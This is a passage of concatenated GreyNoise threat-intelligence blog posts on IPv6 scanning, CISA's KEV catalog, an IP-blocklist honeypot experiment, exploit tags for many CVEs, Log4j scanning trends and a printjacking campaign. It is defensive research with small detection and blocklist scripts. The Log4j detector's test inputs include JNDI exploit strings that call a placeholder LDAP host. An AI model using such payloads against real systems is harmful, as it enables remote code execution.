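    except (dns.resolver.NXDOMAIN, dns.resolver.NoNameservers):
        return False

for nibble in "0123456789abcdef":
    status = "NOERROR" if branch_exists(nibble) else "NXDOMAIN"
    print(f"{nibble}.{BASE} -> {status}")
```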

Another method is to reside inside of providers that are IPv6-routed. BGP announcements provide a direct route to IPv6 networks, but an enumeration of responsive hosts is still an undertaking. Scanners will need to find a way to catalog and call back to the responsive hosts since there could still be many results (and the size of the address is much larger). Providers with IPv6 routing are growing and affordable, making it worthwhile for us to deploy sensors and work with widely used providers to determine who is already getting scanned using this method.

Our current IPv6 status 

What we currently see in our platform begins with reliable identification of IPv6 in IPv4 encapsulation, often referred to as 6in4. None of our sensors are currently located on providers using solely IPv6; therefore, the packets will always be IPv4 encapsulated. 

We also see users querying for IPv6 addresses in the GreyNoise Visualizer, but these queries are often problematic, and GreyNoise can currently do a better job of handling them. Users regularly query for link-local addresses, which are addresses meant for internal network communications. Other queried addresses often come in sets indicating that users are querying IPv6 addresses within their own provider prefix. They may be querying their own IPv6 address or nodes that are attempting neighbor discovery. We are looking at ways to educate and notify users when they input these types of addresses to help them further understand the IPv6 landscape.

The future of IPv6

Though the technicalities of scanning for IPv6 are less straightforward than one would expect, GreyNoise looks to the academic research being done in the IPv6 field to inform future product strategies. As the attack landscape evolves, GreyNoise sensors placed in opportunistic paths will continue to gain and share meaningful IPv6 knowledge for researchers around the world.

Evaluating the CISA KEV

CISA’s Known Exploited Vulnerabilities Catalog: A Performance Review

It’s been over half a year since the U.S. Cybersecurity & Infrastructure Security Agency (CISA) introduced the catalog of Known Exploited Vulnerabilities (KEV) to both Federal agencies and the general public. In this post, we’ll take a clinical look at KEV to see how it has been managed over the past 6+ months, what KEV looks like through a GreyNoise lens, and offer some suggestions for improvements that may help KEV continue to be a useful resource for organizations as they attempt to wade through the annual deluge of CVEs.

CISA KEV: A (Brief) History

In November 2021, CISA launched KEV as part of its mission to support reducing the significant risk of known exploited vulnerabilities outlined in Binding Operational Directive (BOD) 22-01. As CISA puts it: “The KEV catalog sends a clear message to all organizations to prioritize remediation efforts on the subset of vulnerabilities that are causing immediate harm based on adversary activity. Organizations should use the KEV catalog as an input to their vulnerability management prioritization framework.”

CISA recently provided more details around the three points of decision criteria they use to add an item to the KEV catalog. Each entry requires that a vulnerability:

  • has been assigned a Common Vulnerabilities and Exposures (CVE) identifier
  • is under active attempted or successful exploitation (this does not include general scanning, security research, or the mere existence of a proof-of-concept (POC) exploit)
  • has clear remediation guidance that may include applying patches or following official mitigation or workaround guidance

Since the launch, there have been 38 releases (defined as an addition of one or more entries to the catalog in a single day as defined by the dateAdded catalog field) for a total of 777 CVEs.

CISA KEV Performance Review

As of June 14, 2022, the National Vulnerability Database handlers have assessed 11,099 new CVEs in calendar year 2022 alone. Sure, many CVEs do not matter to most enterprises, but they still require some type of assessment, even if said assessment is automated away by vulnerability management solutions. Most security teams will gladly accept some help when it comes to prioritization, and a CVE with a sticky note from CISA attached to it saying “THIS IS IMPORTANT” goes quite a long way, more so than when vendors or pundits all-caps declare that you should PATCH NOW on Twitter.

So, CISA gets a B for providing a small, curated list of what organizations should care about and make operational time for to help ensure the safety and resilience of their workforce, customers/users, and business processes. However, this list is going to keep growing, which reduces overall efficacy over time. I’ll posit some ways CISA can get this up to an A towards the end of this post.

One complaint I’ve had in the past is the KEV release cadence, but I reject my former self’s curmudgeonly assessment because, fundamentally, attackers do not conform to our desired schedules. The initial KEV release was massive (with nearly 300 CVEs), but that’s to be expected since that was the debut of the resource. Each release has happened for a reason. The large volume of ~100 CVEs in March was likely due to those vulnerabilities being exploited by bad actors associated with Russia’s aggression against Ukraine. Some releases with one or two CVEs in them are associated with publicly disclosed bad actors taking advantage of 0-days or recently disclosed flaws in Apple’s iOS or Microsoft’s widely deployed server products.

I’ll give CISA a B-/C+ on this aspect of KEV as it most certainly “needs improvement,” but they are doing the job adequately.

CISA has many seriously old vulnerabilities in the catalog, and they state they use disclosures from “trusted” vendors and other sources for knowledge of the “has been exploited” component of the KEV framework. I’m inclined to trust CISA’s judgment, but not all cyber-folk have such confidence, and — just like your 6th-grade math teacher told you — it’d be great if they showed the work.

For not providing more metadata around each KEV entry, I’ll give CISA a C and provide some ways they can bring that score up as well.

Looking At CISA KEV Through A GreyNoise Lens

Before I get into the advisory section of the post, I thought readers and KEV enthusiasts might want to know if the “Known Exploited” part of KEV was true (i.e., are these CVEs being exploited in the wild?).

As of June 14, 2022, GreyNoise has tags for 161 (~20%) of CVEs in the KEV catalog. It is important to note that with the current sensor fleet’s configurations, GreyNoise won’t see much of the on-node attacker actions that relate to many of the CVEs in the KEV corpus. For the moment, GreyNoise is focused pretty heavily on initial access and other types of remote-oriented exploits. Still, 20% is a pretty solid number, so our data  should be able to tell you if these CVEs are under active exploitation to prove a bit of KEV’s efficacy.

GreyNoise has observed activity in the past seven days for 59 of those KEV CVE tags; in fact, quite a bit of activity: 

I’m not surprised to see the recent, trivial exploit for Atlassian Confluence top the charts, given how quickly attackers moved on it soon after disclosure.

In the future, I’ll do a deeper dive into KEV and GreyNoise tag coverage, but there is most certainly evidence of exploitation for the KEV CVEs that lend themselves to remote exploitation.

Room For Improvement

I gave CISA a B for catalog curation. As noted, a list that grows forever will become yet-another giant list of vulnerabilities that organizations will ignore. Some additional metadata would help defenders filter the list into something manageable, such as:

  • Metrics around exploitation activity. CISA reads reports, watches Twitter, and talks to vendors and internal stakeholders to know whether a vulnerability is being exploited. Adding in some type of metrics such as first_seen, last_seen, and number_of_attackers (allowing for qualitative vs. quantitative values, if necessary) would help bolster defender arguments for getting patch/mitigation time now from operations teams.
  • Where possible (some vulnerabilities are ubiquitous), include a list of industries being targeted, to further help patch/mitigation defense.
  • Split out ICS/OT KEV from “Enterprise” KEV. Sure, folks can filter a JSON or CVE list, but making them separate has the added benefit of both growing at a slower rate.

I gave CISA a B-/C+ on release cadence. Some of the above fields would help justify any sporadic or overly frequent releases, as would links to “trusted” (that’s a loaded word) resources that provide context for each update. Said links should be checked regularly for staleness so they don’t develop the same link rot problem that CVE reference URLs have.

Finally, I gave CISA a C on regularly releasing “old” vulnerabilities. Sure, an argument can be made that you really should have patched a 2012 vulnerability well before 2022. Context for the aged inclusions would be most welcome, especially for the ones that are remote/network vulnerabilities.

Overall, CISA’s Catalog of Known Exploited Vulnerabilities is a good resource that organizations can and should use to help prioritize patching and gain support for said activity within their organizations. Hopefully, we’ll see some improvements by the time KEV’s first anniversary rolls around. Meanwhile, keep your eyes out for more KEV content in the GreyNoise visualizer and in APIs/data feeds as our products work to provide critical vulnerability insight to security teams across the globe.

Mass Exploitation Attacks - Is “Whack-A-Mole” Blocking A Viable Security Strategy?

IP “Whack-a-Mole” experiment – to block or not to block mass exploitation attacks

Security organizations have historically been hesitant to block IP addresses at their perimeter to stop the bad guys. There are two primary reasons for this - the short lifetime of malicious IP addresses, and the generally poor quality of IP block lists (i.e., way too many false positives). As David Bianco mentions in his Pyramid of Pain blog, “If you deny the adversary the use of one of their IPs, they can usually recover without even breaking stride.”

However, in the situation of an emerging “exploit storm” where the organization is exposed with unpatched vulnerable systems, we think that short-term blocking of mass exploitation attackers could be helpful and valuable. So we decided to run an experiment to test whether this strategy (which we started calling “whack-a-mole”) might help.

The whack-a-mole strategy temporarily blocks IP addresses that have been observed scanning for or actively exploiting a vulnerability over the past 24 hours. The intent is to provide breathing space for security teams to patch vulnerable systems and search for compromises that may have occurred before blocking was implemented.

In order to test whether this security strategy could work, GreyNoise Research conducted a study comparing the compromise rates between two weakly-credentialed servers - one using the whack-a-mole IP address blocking strategy, and the other that was wide open to the Internet.

“Whack-a-mole” shows a surprising amount of promise in blocking mass exploitation attacks:

  • Unblocked Host - Time to Compromise - 19 minutes
  • Blocked Host - Time to Compromise - 4 days, 6 hours

Read on for more details about the GreyNoise Research IP Blocking study.

Some Insights from the Apache Log4j Vulnerability Storm

Since early December, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228). This vulnerability was particularly serious given the broad deployment of the Log4j library in internet-facing systems. Because of the massive surge of exploit scanning we observed and requests from our Community, we created a publicly available set of IOCs to help security teams defend themselves from the massive barrage of vuln checking and remote code execution attempts. Within 24 hours, we were able to stand up data sets that included:

The consistent feedback we received was that this data was most helpful in the early (and most crucial) hours and days of this exploit storm.

After things calmed down, we asked ourselves a question - how were people using the data? When we reached out to ask folks, we found two general use cases:

  1. Blocking inbound connections to stop attacks and provide “breathing space” for response efforts
  2. Hunting for compromised systems that may have happened before blocking started

These use cases were particularly interesting to us, given the traditional viewpoint that IP blocking is not useful.

Based on this feedback, we decided to run an experiment with our GreyNoise IP data to determine if there might be some value to the “whack-a-mole” strategy of blocking malicious mass scanner IPs during the early stages of an exploit storm.

What is a “mass exploitation” attack?

According to a recent report by IBM, severe vulnerabilities in internet-facing enterprise software are being exploited and weaponized at an increasing rate and at massive scale. Opportunistic “scan-and-exploit” attacks are quickly approaching phishing as the most-used cyber attack vector, with 34% of attacks in 2021 using vulnerability exploitation, compared to 41% of attacks leveraging phishing.

So we are using the term “Mass Exploitation” to describe these large-scale, opportunistic attacks launched by attackers trying to take advantage of common or newly announced vulnerabilities. These attackers use mass scanning technology to cast a broad net across the entire 4.2 billion IP addresses on the internet, trying to locate, vuln check, and ultimately exploit vulnerable internet-facing devices. This type of attack is very different from a more traditional “targeted attack” that aims for a selected, focused target.

Mass exploitation attacks are internet-wide exploit attempts using state-of-the-art mass scanning technology that targets vulnerable internet-facing systems.

Mass exploitation attacks are conducted for a variety of reasons, including:

  • Adding compromised hosts to a botnet
  • Installing malware such as ransomware, trojans, or Bitcoin miners
  • Gaining access to a network and selling the access to targeted attackers
  • Accessing sensitive data/information
  • Network infiltration
  • Reconnaissance

“Whack-a-mole” experiment setup

Our hypothesis for this experiment was that blocking opportunistic “scan and exploit” IP addresses would meaningfully increase the amount of time it takes for a vulnerable host on the Internet to be compromised.

We set up two identical vulnerable hosts, open to the Internet, with weak or default credentials, and then measured how quickly they would be compromised by credential stuffing/brute force attacks:

  • Services used: SSH/TELNET/FTP/HTTP/REDIS
  • Credentials used: admin/admin

For one of these hosts (the BLOCKED host), we loaded up a list of all the scanner IPs from our GreyNoise NOISE data set into an iptables blocklist. This list came from an export of all IPs seen in GreyNoise in the past day using the filter “last_seen:1d”. For the other host (the UNBLOCKED host), we did not block any IPs.
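For readers who want to reproduce something similar, the sketch below shows one way to turn an exported list of GreyNoise noise IPs into an ipset restore file that iptables can match against. The file names, set name, and sizing are illustrative assumptions; in our experiment the list was a one-time export rather than a continuously refreshed feed.

```python
# Illustrative sketch: convert an exported list of noise IPs (one per line, e.g. from
# a "last_seen:1d" GreyNoise export) into an ipset restore file. Names and sizes are
# assumptions. Load with:   ipset restore < greynoise.ipset
# Match from iptables with: iptables -I INPUT -m set --match-set greynoise-noise src -j DROP
import ipaddress

INPUT_FILE = "greynoise_last_1d.txt"   # hypothetical export file
OUTPUT_FILE = "greynoise.ipset"
SET_NAME = "greynoise-noise"

with open(INPUT_FILE) as src, open(OUTPUT_FILE, "w") as dst:
    dst.write(f"create {SET_NAME} hash:ip family inet maxelem 1000000 -exist\n")
    dst.write(f"flush {SET_NAME}\n")
    for line in src:
        line = line.strip()
        if not line:
            continue
        try:
            ip = ipaddress.IPv4Address(line)   # skip anything that is not a plain IPv4 address
        except ValueError:
            continue
        dst.write(f"add {SET_NAME} {ip} -exist\n")
```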

Our goal was to measure the time to first compromise, as well as the total number of compromises seen over a similar time period. We used OpenCanary for our honeypots and ran the experiment from January 12-30, 2022.

What we found

Our preliminary results show that whack-a-mole blocking works. On average, the wide open (unblocked) server was compromised in 19 minutes, while the blocked host took 4 days, 6 hours, and 24 minutes to be popped. We also measured the average number of compromises per day, and the number of compromise attempts per hour - all of these statistics showed significant differences between the protected and unprotected servers.

One insight worth mentioning is the decay rate we saw with the IP address list we used. For our blocked server, we only sourced one set of IP addresses and did NOT update the list with fresh IPs every 24 hours. What we observed was that connection attempts increased exponentially each day over the 5 days of the experiment, indicating that the list’s effectiveness “decayed” as it aged.


Tracking total attempts against the blocked host, the first day averaged six attempts, while the fifth day saw over 2,500. By comparison, the unblocked hosts saw between 2,100 and 7,100 attempts in their first 24 hours, versus 5-8 attempts on the blocked host. The unblocked hosts ended up getting compromised so quickly that we never kept them up for longer than a day.

One conclusion we can draw from this is that “fresh” IP addresses are crucial. In order to remain effective, an IP blocklist must be updated at least every 24 hours.

How can GreyNoise help with opportunistic attacks?

We have launched a new capability as part of our service called GreyNoise Trends that provides visibility into trending internet-wide exploits, as well as the ability to download “fresh” IP lists of all the malicious IPs participating in the attacks over the past 24 hours. This service was initially created based on customer requests experienced during Log4j. But we think the experiment described above helps validate the value of IP block lists for malicious mass scanners, and their use as part of a whack-a-mole strategy. Of course, your mileage may vary, and your defense infrastructure will be different from ours.

If you’re interested in learning more about this blocking strategy or trying to replicate the experiment for yourself, please visit https://www.greynoise.io/ to create a free Community account, and join our Community Slack to take part in the discussion. Also, please come to our Open Forum webcast on March 17, 2022 at 11am ET. You can register to attend here.

GreyNoise Tag Round Up | January 2022

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self-explanatory.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

Relatively new technology. It's interesting because it raises the question, “why would you scan the internet for that?”, and there's no clear motive that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

Critical vulnerability in MS Windows’ http.sys kernel module.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely used server management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io.

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:

See it on GreyNoise Viz

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances. References:

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution vulnerability in Apache Druid v0.20.0 and earlier. References:

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier; CVE-2021-45046 affects versions 2.15.0 and earlier. References:

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel, which can lead to elevated privileges and remote code execution. References:

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

See it on GreyNoise Viz

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, an unintended master token access issue in NodeBB which can lead to remote code execution. References:

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in vSphere Web Client. References:

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:

See it on GreyNoise Viz

Log4j Analysis - What to Do Before the Next Big One

Over the past month, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228) announced in early December. Between blocking exploitation attempts and trying to identify vulnerable assets, it has already been a long winter for defenders. This vulnerability is particularly challenging because the Apache Log4j library is used within so many different applications worldwide that it created an unusually large surface area for security teams to identify and defend. Now that the initial shock of the vulnerability is over, we wanted to answer some questions received during the exploit surge and identify a few preventative strategies that might help during future outbreaks.

What does scanning for Log4J look like now?

Figure 1: Log4j-related activity from December 10, 2021, to January 12, 2022. ‘Attributable’ activity describes individuals or organizations that voluntarily provided self-attribution while scanning for Log4j.

As of January 2022, a month after the initial CVE announcement, GreyNoise still observes a significant volume of traffic related to the Log4j vulnerability. This traffic is primarily composed of generic JNDI string exploit attempts with known obfuscations.

One of the interesting patterns we saw during the first few days of the Log4j “scan-and-exploit” outbreak was a huge surge in benign actors scanning for the vulnerability. The chart above shows Log4j-related activity broken down by scanners who provided attribution (generally benign scanning done by security firms, researchers, and academics) compared to non-attributed scanning (generally, malicious scanning by threat actors).

A huge part of the surge in scanning activity during the first days of the outbreak can be attributed to benign actors. Within the security community, there is significant discussion about the appropriateness of this scanning volume, as security teams already struggled with the alert volumes this traffic generated during an unfolding emergency. It’s controversial enough that some in the security community are advocating blocking these types of scans.

Should I block the IPs that are scanning?

That depends. GreyNoise tracks internet noise caused by IPs scanning the entire internet, and classifies them as malicious, unknown, or benign based on their behavior and identity. For example, security vendors that scan the internet to identify vulnerable systems who voluntarily provide self-attribution are generally classified as benign. Other IP addresses that do opportunistic or unsolicited scanning, vuln checking, or exploitation are generally classified as malicious.

Note that organizations are not obligated to allow scanning of their network perimeter, regardless of GreyNoise classification. The value of allowing (rather than blocking) any IP seen by GreyNoise will vary depending on an organization’s threat model and security posture. Most benign traffic observed by GreyNoise is intended to provide context, awareness, and added value to the IT and InfoSec community. However, any significant volume of unsolicited traffic, even traffic classified as benign by GreyNoise, may result in SOC alert fatigue and dangerous distraction during an active attack.

Does the GreyNoise tag capture the newest versions/latest associated vulnerabilities?

Mostly. The GreyNoise Log4j tag uses the presence of a JNDI format string within a packet’s body to tag IPs. The tag focuses on the core cause of the Log4j vulnerability, common to all the CVEs related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). As a result, the GreyNoise tag has no false positives and provides substantial coverage for relevant CVEs.

However, GreyNoise researchers have observed at least two examples of attempted Log4j exploits where the malicious string was base64 encoded in an application-specific parameter, allowing it to circumvent the GreyNoise tag.

See the following for more details: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter
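For illustration only, here is a minimal sketch of the general JNDI-string idea, assuming matching happens on the decoded request body. It is not the production GreyNoise tag logic, and, as noted above, it would also miss payloads that are base64-encoded inside application-specific parameters.

```python
# Collapse simple ${lower:x} / ${upper:x} lookups to their literal character,
# then look for the canonical ${jndi: marker. Illustrative sketch only.
import re

SIMPLE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
JNDI_MARKER = re.compile(r"\$\{jndi:", re.IGNORECASE)

def looks_like_log4shell(body: str) -> bool:
    normalized = SIMPLE_LOOKUP.sub(r"\1", body)
    return bool(JNDI_MARKER.search(normalized))

print(looks_like_log4shell("${jndi:ldap://203.0.113.7/a}"))            # True
print(looks_like_log4shell("${${lower:j}${lower:n}di:ldap://x/a}"))    # True
print(looks_like_log4shell("GET /index.html HTTP/1.1"))                # False
```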

Can I get payload data? Pcap?

Not usually. For operational security reasons, GreyNoise does not currently provide raw sensor data, although we may do so in the future. The GreyNoise Visualizer and APIs do expose select user agents and URI paths.

That said, due to the high variance of payloads observed at the peak of Log4j activity in December 2021, GreyNoise researchers elected to curate and publish a unified list of payload examples:

https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

What’s next?

Application-specific attacks leveraging Log4j vulnerabilities. This Apache Log4j vulnerability has been extremely challenging due to the ubiquity of the logging library's use. CVE-2021-44228 had an enormous impact and drew significant attention to how the Log4j library was used within applications worldwide. This attention resulted in several follow-on CVEs that bypassed the initial patch and used varied attack vectors (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). Log4j-related exploit activity may evolve as security researchers continue to scrutinize the library and its usage across various applications. For example, application-specific vulnerabilities like those discovered in H2 Database Console and VMware may become more prevalent. (https://portswigger.net/daily-swig/researchers-discover-log4j-like-flaw-in-h2-database-console, https://www.vmware.com/security/advisories/VMSA-2021-0028.html) At this time, GreyNoise has not observed any notable trends or upticks regarding application-specific Log4j payloads.

There are more servers on the internet than there is IPv4 space to assign each of these servers a unique address. In the case of the HTTP protocol, hundreds of servers may share a single IP address and only be reachable when a specific host header is set as part of the connection request. Scoping out this much larger section of the internet in relation to Log4j is a non-trivial task that remains to be fully explored. It is also one of the reasons the cyber defense search engine “Onyphe” opted against scanning the entire internet for vulnerabilities related to Log4j and instead opted for a more targeted approach.
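To make the virtual-hosting point concrete, here is a small, hedged illustration of how one IP address can answer differently depending on the Host header; the IP and hostnames are placeholders.

```python
# The same IP can serve entirely different applications depending on the Host
# header, which is why scanning by IP alone undercounts exposed services.
import requests

ip = "203.0.113.80"   # placeholder address
for host in ("shop.example.com", "intranet.example.com", "grafana.example.com"):
    try:
        resp = requests.get(f"http://{ip}/", headers={"Host": host}, timeout=5)
        print(host, resp.status_code, resp.headers.get("Server", ""))
    except requests.RequestException as exc:
        print(host, "error:", exc)
```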

Stay tuned to GreyNoise to help identify exploit outbreaks

While things are not as bad as they were in December 2021, we do not envision Log4j scanners and attackers disappearing anytime soon. At GreyNoise, our goal is to help identify these kinds of outbreaks as fast as we possibly can in order to give security teams the time and breathing space they need to get their defenses in place.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Keeping Receipts: GreyNoise Observes Coordinated PrintJacking Campaign Impacting Receipt Printers

On November 24, 2021, GreyNoise’s passive sensor network observed a single IP address mass transmitting a message in plaintext to port 9100, a common port for printer connections. The text is related to Reddit’s /r/antiwork, a subreddit dedicated to discussing and seeking an end to exploitative work. Since the initial observation, we’ve seen a significant increase in transmissions.

Figure 1: Plaintext Message Received by GreyNoise Sensor on November 24, 2021. Source: Twitter

Printers, when exposed to the Internet over port 9100, will print any plaintext received. As seen in Figure 1, this message was formatted with the proper dimensions specifically for receipt printers. This appears to be corroborated by a dozen individuals posting printed receipts from their place of work with variations of the messages observed by GreyNoise (Figure 1). GreyNoise has seen 29 variations of the same few messages, which are provided at the end of this blog.

TIMELINE OF EVENTS

The observed activity began with reconnaissance. GreyNoise saw several actors performing network scans using Nmap, ZMap, and masscan to verify that port 9100 was open before relaying r/antiwork messages. Figure 2 shows the timeline of activity, with more than 60 unique IPs involved over the span of the week.

Figure 2: Timeline of r/antiwork Messages Delivered via Port 9100. Source: GreyNoise

The bulk of the activity originated from IPs belonging to “BL Networks,” a hosting provider based in the Netherlands (view it on GreyNoise). Figure 3 shows the geographical breakdown of IPs transmitting the messages.

Figure 3: Breakdown of Source IP by Country and Type of Port Scanner Used. Source: GreyNoise Analysis Tool, must be logged in to view

While the messages are not specific to the United States, the majority of the traffic was directed at North American IPs.

The GreyNoise Research team was able to identify at least one concerted effort behind the recent activity. Figure 4 shows individual IP activity observed by GreyNoise sensors over time. IPs are colored by their numerical adjacency. For example, 192.168.1.1 and 192.168.1.2 would be colored similarly since they are numerically adjacent, but 10.0.0.1 and 192.168.1.1 are not.
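For readers curious about the mechanics, here is a minimal sketch of that adjacency mapping, assuming IPv4 addresses are converted to their 32-bit integer values and normalized for a colormap (the addresses shown are placeholders, not campaign IPs):

```python
# Map each source IP to its integer value so that numerically close addresses
# (e.g., consecutive IPs in the same /24) end up with similar color values.
import ipaddress

observed_ips = ["192.0.2.10", "192.0.2.11", "198.51.100.7"]  # placeholder examples

def adjacency_value(ip: str) -> int:
    """Return the 32-bit integer value of an IPv4 address."""
    return int(ipaddress.ip_address(ip))

# Normalize to [0, 1] so the values can be fed straight into a colormap.
values = [adjacency_value(ip) for ip in observed_ips]
lo, hi = min(values), max(values)
colors = [(v - lo) / ((hi - lo) or 1) for v in values]
print(dict(zip(observed_ips, colors)))
```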

Researchers observed a diverse set of uncoordinated IP addresses responsible for the activity around Thursday, November 25 (U.S. Thanksgiving) and Friday, November 26 (Black Friday). Prior to November 26, activity was scattered amongst different source IPs and ASN ranges. However, in the following week, we noted two additional sets of coordinated IPs on November 29 and December 2.

Figure 4: Individual Source IP Activity Graphed Against Time. IPs are color-coded by adjacency in IP space. Source: GreyNoise

WHOAMI

Researchers determined that, as of December 2, all servers used to transmit the messages had port 80 open and were running Python 3.9.2 SimpleHTTPServer. The servers exposed a directory containing text files, presumably the content being transmitted to the printers:

Figure 5: Web Root Directory Contents on 168.100.9[.]17, one of the servers involved in the campaign. Source: GreyNoise
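As a side note, a stock Python http.server (SimpleHTTPServer) instance typically identifies itself in the Server response header, which is one way a fingerprint like this can be confirmed. A minimal sketch with a placeholder address:

```python
# Python's built-in http.server announces itself in the Server header,
# e.g. "SimpleHTTP/0.6 Python/3.9.2". The target below is a placeholder.
import requests

resp = requests.get("http://192.0.2.10/", timeout=5)   # hypothetical host
server = resp.headers.get("Server", "")
print(server)
if "SimpleHTTP" in server and "Python/3.9" in server:
    print("Looks like a stock Python http.server / SimpleHTTPServer instance")
```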

Based on associated SSL Certificates and domain information, the team was able to make contact with the current owner of one of the IPs. The owner responded with the following:

Figure 6: Conversation with the person allegedly involved in the campaign. Source: GreyNoise

GreyNoise researchers were unable to determine whether the current owner is responsible for the activity, though they did respond to let us know they took down one of the servers (which GreyNoise has corroborated).

FINAL THOUGHTS

This is not the first time printjacking has occurred. GreyNoise has previously observed coordinated activity on port 9100 in 2018 related to an incident involving YouTube superstar PewDiePie.

When asked for recommendations on best practices, GreyNoise’s IT & Security Director responded: “In order to avoid printjacking, we recommend ensuring port 9100 on your device remains closed to the Internet. If your printer vendor requires connection to an open port, it’s a good time to consider a different provider."
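If you want a quick self-check, the sketch below simply attempts a TCP connection to port 9100; run it from outside your network against your public address (the IP shown is a placeholder) to approximate what the internet sees.

```python
# Check whether a host answers on TCP/9100 (raw printing) from this vantage point.
import socket

def port_9100_open(host: str, timeout: float = 3.0) -> bool:
    try:
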